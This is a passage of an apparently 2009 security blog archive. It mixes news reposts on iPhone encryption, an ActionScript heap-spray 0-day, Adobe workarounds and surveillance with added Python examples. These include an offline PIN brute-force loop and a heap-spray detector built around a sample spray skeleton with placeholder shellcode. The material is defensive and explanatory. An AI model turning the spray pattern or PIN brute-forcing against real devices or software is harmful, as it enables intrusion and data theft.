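    for n in range(10 ** digits):
        pin = f"{n:0{digits}d}"
        plaintext = decrypt_passcode_image(image, pin)
        if plaintext is not None:
            return pin, plaintext
    return None
```

Model 1 is what a thief with a jailbreak and SSH gets for free. Model 2 is what "encryption" has to mean before it protects a stolen handset, and even then the brute-force function shows the next caveat: a four-digit PIN is only as good as the cost of ten thousand key derivations, which is why a passcode-bound key also needs a per-device secret that cannot leave the hardware.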

To demonstrate the technique, Zdziarski established a screenshare with Wired.com, and he was able to tap into an iPhone 3GS’ data with a few easy steps. The encryption did not pose any hindrance.

Nonetheless, professionals using the iPhone for business don’t seem to care, or know, about the device’s encryption weakness.

“We’re seeing growing interest with the release of iPhone 3.0 and the iPhone 3GS due in part to the new hardware encryption and improved security policies,” Cook said during Apple’s earnings call. “The phone is particularly doing well with small businesses and large organizations.”

Clearly, the gigantic offering of iPhone applications is luring these business groups. Quickoffice Mobile, for example, enables users to access and edit Microsoft Word or Excel files on their iPhone. For handling transactions, merchants can use apps such as Accept Credit Cards to process a credit card on an iPhone anywhere with a Wi-Fi or cellular connection.

Several employees of Halton Company, an industrial equipment provider, are using iPhones for work, according to Lance Kidd, chief information officer of the company. He said the large number of applications available for the iPhone make it worthy of risk-taking.

“Your organization has to be culturally ready to accept a certain degree of risk,” Kidd said. “I can say we’ve secured everything as tight as a button, but that won’t be true…. Our culture is such that our general manager is saying, ‘I’m willing to take the risk for the value of the applications.’”

Kidd noted that Halton employees are not using iPhones for holding confidential customer information, but rather for basic tasks such as e-mailing and engaging with clients via social networking sites such as Facebook and Twitter. Halton also plans to code apps strictly for use at the company, Kidd said.

According to Kidd, a security expert performed an evaluation of Halton, and he said it was possible for any hacker to find an infiltration no matter the level of security. Therefore, Halton has measures in place to respond to an information security threat rather than attempt to avoid it.

“It’s like business continuity,” Kidd said. “You prepare for disasters. You prepare for if there’s an earthquake and the building breaks down, and you prepare for if there’s a crack in [information] security.”

But Zdziarski stands firm that the iPhone’s software versatility isn’t worth the risk for use in the workforce. He said sensitive information is bound to appear in e-mails or anything that can be contained on the iPhone’s disk, which can be easily extracted by thieves thanks to the new handset’s shoddy encryption.

---------------------

Let's get real here, the iPhone was never designed for business. It was born from the hugely popular iPod, which we would all agree wasn't designed with business needs in mind either.

Beyond the weak encryption on the device itself...why would any company want iTunes and QuickTime installed on its laptops, especially if they aren't required for business? Personally, I don't see many business benefits in iTunes anyway.

Every piece of software that is installed on a system increases its possible attack surface. Combined with Apple's lackluster security practices (both on a coding level & a communication level)....you have a recipe for increased risk of data breach...both on the iPhone and the machines used to manage it.

In 2007, Gartner suggested keeping the iPhone out of the enterprise...and from a strictly security perspective, I see few reasons overall to change that suggestion.

Friday, July 24, 2009

Blackhat 2009 Preview - Bypassing IE ActiveX Killbits

Preview Video
http://www.hustlelabs.com/bh2009preview/

Blackhat 2009 - The Language of Trust: Exploiting Trust Relationships in Active Content
https://www.blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Dowd

SHA-3 Second Round Candidates

NIST has selected the Second Round Candidates of the SHA-3 Competition. A report summarizing NIST’s selection of these candidates will be forthcoming. A year is allocated for the public review of these algorithms, and the Second SHA-3 Candidate Conference is being planned for August 23-24, 2010, after Crypto 2010.

------------------

Make sure you check out the SHA-3 Zoo as well...good stuff.

Al-Shabaab Takes Over Two United Nations Offices in Somalia

Via Shimron Letters -

The Somali armed rebel group, Al Shabaab, looted two UN compounds and demanded an end to UN relief work in the impoverished Horn of Africa nation, the UN said Monday.

Al Shabaab, which has been trying to overthrow the transitional government in Mogadishu, looted the UN compound in Baidoa of emergency communication equipment, forcing the organisation to evacuate personnel and suspend its operations.

The UN said it was powerless when challenged by the rebels because the compound had no security guards.

In Wajid, protected by a minimum security, the rebels entered the compound of the World Food Programme and drove away with two vehicles and some furniture that did not belong to the UN.

“These two events happened as Al Shabaab broadcast on Monday a message on local Somali radio calling for the closing of offices” of several UN agencies, including the UN Development Programme, the UN said.

“The UN is reassessing the situation on the ground and is optimistic that the minimal conditions on the ground will be restored to allow the critical humanitarian work to resume in Baidoa and continue elsewhere in Somalia,” the UN said.

Russian Navy Declassifies Cold War Close Encounters

Via Wired.com (Danger Room) -

Great catch by Phil Ewing at Navy Times' Scoop Deck blog: the Russian navy has just declassified its records of Cold War UFO sightings. Turns out “50 percent of UFO encounters are connected with oceans. Fifteen [percent] more — with lakes. So UFOs tend to stick to the water,” one Russian officer explained.

“On several occasions the instruments gave reading of material objects moving at incredible speed,” a sub commander recalled. “Calculations showed speeds of about 230 knots, or 400 kph. Speeding so fast is a challenge even on the surface. But water resistance is much higher. It was like the objects defied the laws of physics. There’s only one explanation: the creatures who built them far surpass us in development.”

Insert jab about superior U.S. Navy submarine technology, here.

All joking aside, in one alleged incident in 1982, three navy diver trainees reportedly died pursuing what survivors described as “a group of humanoid creatures dressed in silvery suits” in Baikal, the world’s deepest lake.

Heap Spraying with Actionscript

Via FireEyes Malware Intelligence Lab -

As you may have heard, there's a new Adobe PDF-or-Flash-or-something 0-day in the wild. So this is a quick note about how it's implemented, but this blog post is not going to cover any details about the exploit itself.

Most of the Acrobat exploits over the last several months use the now-common heap spraying technique, implemented in JavaScript/ECMAScript, a Turing-complete language that Adobe thought would go well with static documents. (Cause that went so well for PostScript.) (Ironically, PDF has now come full circle back to having the features of PostScript that it was trying to get away from.) The exploit could be made far, far less reliable by disabling JavaScript in your Adobe Acrobat Reader.

But apparently there's no easy way to disable Flash through the UI. US-CERT recommends renaming the %ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll and %ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll files. [Edit: Actually the source for this advice is the Adobe Product Security Incident Response Team (PSIRT).]

Anyway, here's why… Flash has its own version of ECMAScript called ActionScript, and whoever wrote this new 0-day finally did something new by implementing the heap-spray routine with ActionScript inside of Flash.
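Whether the spray is written in JavaScript or ActionScript, it has the same two ingredients: a block of low-diversity filler (the "NOP sled", often doubling as the landing address) and a loop that replicates it until the heap is full. As an added example (not FireEye's code and not the in-the-wild sample), here is a Python heuristic an analyst could run over script extracted from a PDF or SWF: it decodes the literal bytes the script would put on the heap, checks whether they are mostly one byte, and looks for the replication loop. The regexes, the thresholds and the two constructed samples are my assumptions; it covers both the unescape() style and the ByteArray.writeUnsignedInt() style so that a port from one language to the other does not dodge it.

```python
import re
from collections import Counter

# Heuristics, not signatures. Flagging needs a filler/address indicator AND a replication loop.
UNESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})")
INT_WRITE_RE = re.compile(r"writeUnsignedInt\s*\(\s*(0x[0-9a-fA-F]+|\d+)\s*\)")
SPRAY_ADDR_RE = re.compile(r"0x0c0c0c0c|0x0d0d0d0d|%u0c0c|%u0d0d", re.I)
# for/while followed within 200 chars by string growth, array push, indexed store or a ByteArray write
REPLICATE_RE = re.compile(
    r"\b(?:for|while)\b.{0,200}?(?:\+=|\.push\(|writeBytes\(|writeUnsignedInt\(|\[[^\]\n]+\]\s*=)",
    re.S,
)


def decode_payload_bytes(script: str) -> bytes:
    """Turn %uXXXX escapes (little-endian, as unescape() lays them out) and
    writeUnsignedInt() constants into the bytes they would put on the heap."""
    out = bytearray()
    for m in UNESCAPE_RE.finditer(script):
        out += int(m.group(1), 16).to_bytes(2, "little")
    for m in INT_WRITE_RE.finditer(script):
        text = m.group(1)
        value = int(text, 16) if text.lower().startswith("0x") else int(text)
        out += (value & 0xFFFFFFFF).to_bytes(4, "little")
    return bytes(out)


def sled_ratio(payload: bytes) -> float:
    """Share of the payload taken by its single most common byte (1.0 = pure sled)."""
    if not payload:
        return 0.0
    return Counter(payload).most_common(1)[0][1] / len(payload)


def score(script: str):
    """Returns (flagged, reasons). Flags only when a filler or address indicator AND a
    replication loop co-occur, so an ordinary accumulator loop on its own is not enough."""
    reasons = []
    payload = decode_payload_bytes(script)
    if len(payload) >= 8 and sled_ratio(payload) >= 0.5:
        reasons.append("low-diversity payload bytes (NOP sled)")
    if SPRAY_ADDR_RE.search(script):
        reasons.append("classic spray address (0x0c0c0c0c / 0x0d0d0d0d)")
    replicates = REPLICATE_RE.search(script) is not None
    if replicates:
        reasons.append("replication loop")
    return replicates and len(reasons) >= 2, reasons


# Constructed samples (not the in-the-wild exploit): a spray skeleton and a harmless loop.
SPRAY_SAMPLE = """
var sled:String = "%u0c0c%u0c0c";                 // filler doubles as landing address
while (sled.length < 0x20000) sled += sled;       // grow the block
var shellcode:String = "%u4141%u4242";           // placeholder bytes, not real shellcode
var blocks:Array = new Array();
for (var i:int = 0; i < 300; i++) { blocks[i] = sled + shellcode; }
var mem:ByteArray = new ByteArray();
for (var j:int = 0; j < 0x4000; j++) mem.writeUnsignedInt(0x0c0c0c0c);
"""
BENIGN_SAMPLE = """
var total:Number = 0;
for (var i:int = 0; i < items.length; i++) { total += items[i].price; }
trace("total: " + total);
"""

if __name__ == "__main__":
    for name, sample in (("spray", SPRAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, score(sample))
```

Expect false negatives from obfuscation (the filler built from charCodeAt arithmetic, the loop hidden behind a function call); the point of the co-occurrence rule is to keep false positives low on ordinary code, and the sled-ratio check is the part that survives a straight JavaScript-to-ActionScript port.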

Thursday, July 23, 2009

Microsoft Scrambling to Close Stubborn Security Hole

Via Security Fix -

Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month, Security Fix has learned.

Last week, on its regularly scheduled Patch Tuesday (second Tuesday of the month), Redmond issued software updates to plug nine security holes. Among those was a patch for a flaw in Windows and Internet Explorer that hackers were exploiting to break into PCs. However, it soon became clear that Microsoft had known about this vulnerability since at least April 2008.

On July 9, noted security researcher Halvar Flake published a blog post suggesting that the reason Microsoft took so long to fix the bug may be because the flaw was caused by a far more systemic problem in Windows.

According to Flake, the problem resides in a collection of code that Microsoft uses in a number of places in Windows. This code "library" is also provided to third-party software makers to help them build programs that can leverage certain built-in features of Windows.

As a result, Flake concluded, Microsoft may have fixed only a subset of the problem on Windows with its patch this month.

"The bug is actually much 'deeper' than most people realize," Flake wrote. "MS might have accidentally introduced security vulnerabilities into third party products."

I reached out to Flake for additional information, but he told me that shortly after he published that blog post he received a 3 a.m. phone call from Microsoft asking him please not to comment further.

Microsoft has not officially responded to requests for comment about Flake's research. But a source within Microsoft said Redmond could issue an out-of-band update prior to next month's Patch Tuesday to address the outstanding flaws.

The decision over whether to do that or wait until next month's Patch Tuesday may hinge upon whether attackers begin exploiting these other vulnerable areas by using Microsoft's patch (and Flake's research) as a guide to locating the flaws. What's more, this bug is almost certain to be discussed at Black Hat and Defcon, the world's largest annual security conferences, being held next week in Las Vegas.

Indonesian Unaware Husband was Noordin Mohammed Top - Jemaah Islamiya's Bomb Maker & Financier

Via Reuters -

The Indonesian wife of Noordin Top, the region's most-wanted militant because of his role in a string of bomb attacks in Indonesia, did not know his real name and thought he was a teacher, her lawyer said on Thursday.

Malaysian-born Top is one of the prime suspects behind last week's near-simultaneous suicide bomb attacks on the JW Marriott and Ritz-Carlton, two luxury hotels in Jakarta's main business district, which killed nine people and injured 53, including Indonesians and foreigners.

Police and security analysts said the attacks bore the hallmarks of Jemaah Islamiah (JI), the militant Islamist group responsible for previous attacks in Jakarta and on the resort island of Bali, or of a splinter group headed by Top.

Arina Rochmah was detained by the police under Indonesia's terrorism law, her lawyer Achmad Michdan told Reuters, adding that she could be charged for harbouring or hiding information about a terror suspect.

Michdan said Rochmah had no knowledge that her husband, Abdul Halim, was Noordin Top, although she admitted he was seldom at home due to his work teaching at an Islamic boarding school in South Sulawesi.

He said that police took Rochmah, 25, her two children and her mother on Wednesday from an Islamic boarding school founded by her father in Cilacap, in central Java.

Michdan added that Rochmah had come to Jakarta and asked for legal protection a few weeks ago, after the police raided the family's house. Police said that a bomb found at the house was identical to those used in Friday's blasts.

Under the terrorism law, police have seven days to declare someone a suspect.

--------------------------------

Having fled Malaysia after the government cracked down on Islamists following the September 11th attacks, he married using an assumed name, Abdurrachman Aufi.

In early 2006, Noordin Top is believed to have drifted away from the main Jemaah Islamiah structure due to a disagreement about attacks on "soft targets", which often kill civilians. Police said he was claiming to lead a previously unknown group called Tanzim Qaedat al-Jihad.

In naming the group "Tanzim Qaedat al-Jihad," or "Organization for the Base of Jihad," Top has intentionally established a clear association with Osama bin Laden's al Qaeda, mimicking early moves by Abu Musab al-Zarqawi as he was seeking to establish his credibility in Iraq.

Wednesday, July 22, 2009

The Economics of Botnets

Via Viruslist.com -

In the past ten years, botnets have evolved from small networks of a dozen PCs controlled from a single C&C (command and control center) into sophisticated distributed systems comprising millions of computers with decentralized control. Why are these enormous zombie networks created? The answer can be given in a single word: money.

A botnet, or zombie network, is a network of computers infected with a malicious program that allows cybercriminals to control the infected machines remotely without the users’ knowledge. Zombie networks have become a source of income for entire groups of cybercriminals. The invariably low cost of maintaining a botnet and the ever diminishing degree of knowledge required to manage one are conducive to growth in popularity and, consequently, the number of botnets.

So how does one start? What does a cybercriminal in need of a botnet do? There are many possibilities, depending on the criminal’s skills. Unfortunately, those who decide to set up a botnet from scratch will have no difficulty finding instructions on the Internet.

---------------------------------

Check out the full article...good stuff.

Apple Backs Down On Bluwiki Threats

Via EFF -

Apple has retracted its legal threats against public wiki hosting site Bluwiki, and, in response, EFF is dismissing its lawsuit against Apple over those threats. The skirmish involved a set of anonymously authored wiki pages in which hobbyists were discussing how to "sync" media to iPods and iPhones using music library playback software other than Apple's own iTunes.

In November 2008, Apple sent a series of legal threats to the operator of Bluwiki, alleging that these hobbyist discussions about interoperability violated copyright law and constituted a violation of the Digital Millennium Copyright Act (DMCA), even though the author(s) of the pages had not yet figured out how to accomplish their goal. In response to Apple's legal threats, Bluwiki took down the wiki pages in question. In April 2009, EFF and the San Francisco law firm Keker & Van Nest sued Apple on behalf of OdioWorks, which runs Bluwiki, asking a court to reject Apple's claims and allow Bluwiki to restore the discussions.

On July 8, 2009, Apple sent letter withdrawing its cease-and-desist demands and stating that "Apple no longer has, nor will it have in the future, any objection to the publication of the iTunesDB Pages." As a result, EFF has moved to dismiss its complaint against Apple.

"While we are glad that Apple retracted its baseless legal threats, we are disappointed that it only came after 7 months of censorship and a lawsuit," said EFF Senior Staff Attorney Fred von Lohmann. "Because Apple continues to use technical measures to lock iPod Touch and iPhone owners into -- and Palm Pre owners out of -- using Apple's iTunes software, I wouldn't be surprised if there are more discussions among frustrated customers about reverse engineering Apple products. We hope Apple has learned its lesson here and will give those online discussions a wide berth in the future."

For more details:
http://www.eff.org/deeplinks/2009/07/apple-backs-down-blu

For more information about OdioWorks v. Apple:
http://www.eff.org/cases/odioworks-v-apple

Adobe Reader, Acrobat and Flash Player Vulnerability

Via US CERT -

Adobe has released a blog post indicating that it is aware of reports of a vulnerability affecting Adobe Reader and Acrobat 9.1.2 and Flash Player 9 and 10.

US-CERT encourages users and administrators to review the blog post and implement the following workarounds until the vendor releases additional information:

  • Disable Flash in Adobe Reader 9 on Windows platforms by renaming the following files: "%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll" and "%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll".
  • Disable Flash Player or selectively enable Flash content as described in the Securing Your Web Browser Document.
Additional information regarding this vulnerability can be found in the Vulnerability Notes Database.

US-CERT will provide additional information as it becomes available.
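The renaming workaround above (the same one quoted in the FireEye post earlier on this page) is easy to get half-done across a fleet, so here is an added Python helper, not part of the advisory, that applies it, reports status and reverts it once the patch ships. The .disabled suffix and the sandbox helper are my assumptions. On Windows the rename fails with a permission error while Reader, or a browser plug-in instance of it, has the DLL loaded, so run it elevated with Reader closed, and re-check status after any Reader update or repair, which can put the files back.

```python
import os
import tempfile
from pathlib import Path

# Location named in the advisory; pass reader_dir for a non-default install.
DEFAULT_READER_DIR = (
    Path(os.environ.get("ProgramFiles", r"C:\Program Files")) / "Adobe" / "Reader 9.0" / "Reader"
)
FLASH_DLLS = ("authplay.dll", "rt3d.dll")   # the two files the advisory says to rename
DISABLED_SUFFIX = ".disabled"               # assumed naming; any non-.dll name will do


def flash_status(reader_dir=DEFAULT_READER_DIR) -> dict:
    """Per DLL: 'active' (workaround not applied), 'disabled', or 'missing'."""
    status = {}
    for name in FLASH_DLLS:
        dll = Path(reader_dir) / name
        if dll.exists():
            status[name] = "active"
        elif dll.with_name(name + DISABLED_SUFFIX).exists():
            status[name] = "disabled"
        else:
            status[name] = "missing"
    return status


def disable_flash(reader_dir=DEFAULT_READER_DIR) -> list:
    """Apply the workaround. Idempotent: returns only the files renamed on this call."""
    renamed = []
    for name in FLASH_DLLS:
        dll = Path(reader_dir) / name
        if dll.exists():
            dll.rename(dll.with_name(name + DISABLED_SUFFIX))
            renamed.append(name)
    return renamed


def enable_flash(reader_dir=DEFAULT_READER_DIR) -> list:
    """Revert once the vendor patch is installed. Returns the files restored."""
    restored = []
    for name in FLASH_DLLS:
        disabled = Path(reader_dir) / (name + DISABLED_SUFFIX)
        if disabled.exists():
            disabled.rename(disabled.with_name(name))
            restored.append(name)
    return restored


def make_sandbox_reader_dir() -> Path:
    """Dry-run scaffold: a temp directory with stand-in DLL files, so the logic can be
    exercised without touching a real Reader install."""
    sandbox = Path(tempfile.mkdtemp(prefix="reader-sandbox-"))
    for name in FLASH_DLLS:
        (sandbox / name).write_bytes(b"MZ")   # placeholder content, not a real DLL
    return sandbox


if __name__ == "__main__":
    print(flash_status())
```

Check status before and after: a host reporting one DLL "disabled" and the other "active" has the workaround only half applied, and "missing" for both usually means a different Reader version or install path rather than a protected machine.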

Russian Intelligence Granted New Powers Over Citizens

Via Jamestown Foundation -

On July 6, the Russian ministry of communications posted its Order 65 on its official website (www.minkomsvjaz.ru). Effective as of July 21, the order decrees that Russian postal services must make available for inspection on demand to the Federal Security Service (the FSB, the main successor to the Soviet KGB) and seven other Russian security service agencies any private mail or shipments, as well as its exhaustive data on senders and addressees. Special rooms where security officers will be able to open and inspect private mail were decreed to be established at post offices. Order 65 also cancels the privacy of electronic correspondence. Operators will now formally grant the security services access to their electronic databases.

Though Soviet or Russian security services never hesitated to intercept, monitor, inspect or confiscate private correspondence, nothing like Order 65 has ever occurred openly, formally or so blatantly - not even under Soviet rule.

Order 65 is in manifest contravention of the 1966 International Covenant on Civil and Political Rights (ICCPR), a United Nations treaty, based on the Universal Declaration of Human Rights - Russia is a signatory to both. It is also in contravention of Article 23 of the Russian constitution, which proclaims the complete privacy of telephone, postal and other communications and states unequivocally that this privacy can be lifted solely on the authority of the courts.

However, Order 65 contains no reference to making private correspondence available to the security services on the strength of a court decision. The Order leaves such decisions at the discretion of the security services. In 2000 and 2007 the Russian supreme court (and also in 2003 in the constitutional court) upheld Article 23 of the constitution, and ruled that mail operators could not disclose private correspondence or telephone communications to the security services, without first securing a court order (www.newsru.com, July 15).

Yuri Vdovin, a prominent St. Petersburg-based human rights activist, told Echo Moskvy Radio that Order 65 signifies a decisive step towards a totalitarian state. Unless this is revoked, Vdovin maintains, the next steps will include unlawful detentions and searches. Vdovin believes that the authorities are seeking ways to prevent possible social unrest, and take under their control any structures that might emerge in order "not to let the people speak their mind" (www.newsru.com, July 15).

At the same time as this secret police surveillance of correspondence was openly decreed, the ministry of the interior (the MVD) was setting up special regional task forces to keep track of public attitudes, in an effort to prevent public protests caused by the worsening economic situation in Russia. Interior Minister Rashid Nurgaliyev told the press that he expected this effort to allow the police and authorities to work preemptively and prevent an escalation of protests during the economic crisis. Nurgaliyev wants incoming evidence of growing social tension to be analyzed. If economic factors are deemed responsible, police will inform local officials and the government in order to launch preventive measures jointly, and keep any potential unrest under control (www.theotherrussia.org, July 15).

To complement this massive gathering of information, the MVD is also strengthening its already considerable forces to act on the basis of the information obtained. In the Moscow suburbs, they are now forming a new elite brigade named "avant-garde," which will specialize in maintaining public order during large-scale demonstrations. The force is expected to deploy across the country at short notice (www.theotherrussia.org, July 15).

These latest steps form a new chapter in Russia's progression towards a totalitarian state, and they logically complement previous punitive measures, launched by the Putin government, previously highlighted by the Jamestown Foundation (EDM, January 5). Some Russian experts now estimate the total strength of the MVD and other security forces at 2.5 million, which are assigned to crush the projected domestic protests. They see this process as a crisis demanding the militarization of the state (www.newsru.com, July 14).

Osama Bin Laden's Son Thought Killed in Predator Strike

Via The Long War Journal -

Sa'ad bin Laden, the son of Osama bin Laden, is thought to have been killed in a US Predator airstrike in Pakistan's tribal areas. The report has not been confirmed.

Sa'ad is thought to have been killed during a strike earlier this year, US intelligence officials told The Long War Journal.

"We're pretty sure but we're not certain," one official said. "We are hopeful."

US intelligence officials want to confirm or deny Sa'ad's death by using DNA testing. But it is unclear if they have recovered a body from the attack site.

The officials would not identify the date or the location of the airstrike that is thought to have killed Sa'ad. The covert US air campaign has focused heavily on North and South Waziristan. Fifty percent of the attacks occurred in South Waziristan, and 38 percent took place in North Waziristan, according to data compiled by The Long War Journal. The US has killed a total of 22 High Value Targets, which include some of the high- and mid-level Taliban and al Qaeda leadership in the tribal agencies since the first strike was reported back in June 2004 [see LWJ report, US Predator strikes in Pakistan: Observations].

Al Qaeda has neither confirmed nor denied Sa'ad's death. Al Qaeda typically issues a martyrdom statement for senior leaders and commanders who have been killed in battle.

Sa'ad is considered a senior leader in al Qaeda. He is an operational commander who was involved in the 2003 bombings in Riyadh, Saudi Arabia. He is known to shelter in Iran and move back and forth across the border with Pakistan.

He is reported to have facilitated communications between Ayman al Zawahiri and Qods Force, the notorious special operations branch of the Iranian Revolutionary Guards Corps, in September 2008 after the deadly attack on the US embassy in Yemen.

Sa'ad made "key decisions for al Qaeda and was part of a small group of al Qaeda members that was involved in managing the terrorist organization from Iran," according to the US Treasury report that designated him as a terrorist on Jan. 16, 2009. "As of September 2008, it was possible that Sa'ad bin Laden was no longer in Iranian custody," the Treasury reported.

Sa'ad is believed to have entered Pakistan’s northwest to meet with Zawahiri in Pakistan sometime in early September, according to Mike McConnell, the outgoing Director of National Intelligence.

NSA Using Cloud Model For Intelligence Sharing

Via InformationWeek -

The National Security Agency is taking a cloud computing approach in developing a new collaborative intelligence gathering system that will link disparate intelligence databases.

The system, currently in testing, will be geographically distributed in data centers around the country, and it will hold "essentially every kind of data there is," said Randy Garrett, director of technology for NSA's integrated intelligence program, at a cloud computing symposium last week at the National Defense University's Information Resources Management College.

The system will house streaming data, unstructured text, large files, and other forms of intelligence data. Analysts will be able to add metadata and tags that, among other things, designate how securely information is to be handled and how widely it gets disseminated. For end users, the system will come with search, discovery, collaboration, correlation, and analysis tools.

The intelligence agency is using the Hadoop file system, an implementation of Google's MapReduce parallel processing system, to make it easier to "rapidly reconfigure data" and for Hadoop's ability to scale.

The NSA's decision to use cloud computing technologies wasn't about cutting costs or seeking innovation for innovation's sake; rather, cloud computing was seen as a way to enable new scenarios and unprecedented scalability, Garrett said. "The object is to do things that were essentially impossible before," he said.

NSA's challenge has been to provide vast amounts of real-time data gathered from intelligence agencies, military branches, and other sources of intelligence to authorized users based on different access privileges. Federal agencies have their own systems for sharing information, but many remain disconnected, while community-wide systems like Intellipedia require significant user input to be helpful.
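The tag-driven access the article describes comes down to a dominance check that has to run before any query or aggregate does. The Python below is an added example, not NSA's code: a handling label is a level plus a set of compartments, a separate dissemination tag says which organisations may receive a record, and the per-source tally is computed only over what the analyst is allowed to see, because a count taken over the whole pool would itself leak how much exists above the analyst's clearance. Level names follow the usual US scheme; the feeds, records and organisation names are constructed. (One factual note on the paragraph above: Hadoop's storage layer, HDFS, follows Google's GFS design, and MapReduce is Hadoop's separate processing layer; this example only mirrors the map/filter/reduce shape.)

```python
from dataclasses import dataclass

# Hierarchical levels; a higher number dominates a lower one.
LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}


@dataclass(frozen=True)
class Label:
    """Handling label: a level plus a set of compartments (need-to-know)."""
    level: str
    compartments: frozenset = frozenset()

    def dominates(self, other: "Label") -> bool:
        """A reader may see data iff their level is >= and they hold every compartment on it."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and other.compartments <= self.compartments)


@dataclass(frozen=True)
class Record:
    source: str
    body: str
    label: Label
    releasable_to: frozenset   # dissemination tag: organisations allowed to receive it


def visible(records, clearance: Label, org: str):
    """Apply both tags: classification dominance AND dissemination."""
    return [r for r in records if clearance.dominates(r.label) and org in r.releasable_to]


def tally_by_source(records, clearance: Label, org: str) -> dict:
    """Map/reduce-shaped aggregation. The filter runs before the reduce: counting over
    the whole pool and filtering afterwards would leak record counts at levels the
    analyst cannot read."""
    counts = {}
    for r in visible(records, clearance, org):
        counts[r.source] = counts.get(r.source, 0) + 1
    return counts


# Constructed sample pool (not real intelligence data).
POOL = [
    Record("feed-a", "open-source news item", Label("UNCLASSIFIED"),
           frozenset({"NSA", "DoD", "partner"})),
    Record("feed-a", "compartmented report", Label("SECRET", frozenset({"ALPHA"})),
           frozenset({"NSA", "DoD"})),
    Record("feed-b", "other compartment", Label("SECRET", frozenset({"BRAVO"})),
           frozenset({"NSA"})),
    Record("feed-b", "highest level", Label("TOP SECRET", frozenset({"ALPHA"})),
           frozenset({"NSA"})),
]

if __name__ == "__main__":
    analyst = Label("SECRET", frozenset({"ALPHA"}))
    for r in visible(POOL, analyst, "DoD"):
        print(r.source, r.label.level, r.body)
    print(tally_by_source(POOL, analyst, "DoD"))
```

The two tags are deliberately independent: a TOP SECRET clearance with no compartments does not see a SECRET/ALPHA record, and holding the compartment does not help an organisation the record is not releasable to. Whatever the real system uses for storage, this check is the part that must sit in front of search, correlation and analysis alike.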

The NSA effort is part of Intelligence Community Directive 501, an effort to overhaul intelligence sharing proposed under the Bush administration. Current director of national intelligence Dennis Blair has promised that intelligence sharing will remain a priority.

"The legacy systems must be modernized and consolidated to allow for data to actually be shared across an enterprise, and the organizations that collect intelligence must be trained and incentivized to distribute it widely," he said in response to questions from the Senate prior to his confirmation.

The new system will run on commodity hardware and "largely" on commercial software, Garrett said. The NSA will manage the arrayed servers as a pool of resources rather than as individual machines.

Deutsche Bank Fires Two as Possible Inquiry Looms

Via NYTimes -

Two executives have been fired at Deutsche Bank as prosecutors consider whether to open a criminal inquiry into surveillance measures conducted against board members and a shareholder advocate.

The executives fired were Wolfram Schmitt, head of investor relations, and Rafael Schenz, German security chief, a person with direct knowledge of the matter said on Tuesday. The person was not authorized to speak on the record and declined to be named.

The bank had ordered an internal review of possible violations of privacy laws in May, after several cases came to light. On Monday, the data protection agency for Hesse, the state where Deutsche Bank is based, said it had forwarded the case to state prosecutors in Frankfurt, after reviewing a preliminary report by the independent law firm Cleary Gottlieb Steen & Hamilton, which had been hired by the bank to conduct the review.

Doris Möeller-Scheu, a prosecutor and spokeswoman for the Frankfurt prosecutor’s office, said the office had received a “very big dossier” and would need about three weeks to decide whether a criminal investigation was warranted.

Ronald Weichert, head of media relations at Deutsche, said the bank could not comment until the report on its internal investigation was finished.

In May, the bank issued a statement saying that it had “learned about possible violations which occurred in past years of the bank’s internal procedures or legal requirements in connection with activities involving the bank’s corporate security department.”

The dismissal of Mr. Schmitt stems from the case of Michael Bohndorf, a shareholder with a history of litigation against the bank who was known to ask critical questions at its shareholder meetings.

After a shareholder’s meeting in 2006, Deutsche Bank hired private investigators to spy on Mr. Bohndorf, posing as vacationers to rent his house in Ibiza and trying to establish a link between him and Leo Kirch, a media tycoon who had waged a legal battle against the bank accusing it of provoking the collapse of some of his companies.

Around that same time, private investigators tested the security measures that Deutsche’s chief operating officer, Hermann-Josef Lamberti, took to protect himself from being tracked and bugged. Detectives tried to plant a GPS device on his car and to smuggle an inactive listening device into his house with a flower delivery.

Chinese News Sites Go Down After Reports on Gov't Scandal

Via cio.com -

Two of China's most popular technology news Web sites went offline Tuesday after carrying news reports that linked the son of China's president to a corrupt African deal.

The technology news sections disappeared for several hours from major Chinese portals Sina.com.cn and NetEase.com early Tuesday afternoon, when they started redirecting viewers to general news pages. Both tech sections had carried reports on a state-owned company accused of bribing Namibian officials in the last day, but those reports were missing when the Web pages reappeared.

The suspensions appeared to be a government penalty against the companies for reporting on a sensitive political issue.

"I'm impressed by the bravery of Sina and Netease in attempting to report this at all," said Rebecca MacKinnon, a Hong Kong-based expert on the Internet in China, in an online message.

Information on top leaders' children has always been off-limits in Chinese media, though the Internet has made it more difficult to control discussions on such topics, MacKinnon said.

Chinese police heavily patrol the Internet, and Internet companies run rigorous screening to prevent sensitive information from appearing on user forums or in search results on their sites. Companies can be punished if that process fails to catch certain political or pornographic content.

"This is not particularly surprising or different from long-standing censorship patterns," MacKinnon said.

A story posted on the NetEase tech page the night before its suspension cited English broadcaster BBC as saying that Nuctech, a Chinese company, was suspected of bribery in a deal to provide scanners for airports and ports in Namibia. The BBC report had said Namibian authorities wanted to question Hu Haifeng, the former company president and son of Chinese president Hu Jintao, but did not suspect him in the case.

The NetEase story did not mention Hu, but said Namibia wanted to question "relevant" Nuctech executives.

Sina's tech page carried a similar article the next morning, hours before the sites went down. After the tech sections returned to the portals, visiting the URLs of the scandal reports returned messages that they could not be found or had been deleted.

An employee who answered the phone at NetEase Tuesday said its tech section was down for tests. Sina did not respond to a request for comment.

Nuctech's parent company, Tsinghua Holdings, controls a range of other technology companies including Chinese PC maker Tsinghua Tongfang.

Tuesday, July 21, 2009

Vordel SOAPBox is Now Free!

http://www.vordel.com/products/soapbox/

Vordel SOAPbox allows developers to test the performance, scalability, and security of Web Services. Using SOAPbox, a developer can test how Web Services perform under load, how they deal with unexpected input, and what their traffic ceiling is.

Vordel SOAPbox highlights security tokens, XML Signatures, and encrypted content in XML documents. SOAPbox supports established security technologies such as SSL and HTTP-Auth, as well as next-generation security technologies such as WS-Security and SAML.

-------------------------

My team has been using this tool for quite some time...and it was worth the money.

But now it is free. Just input your e-mail...and download.

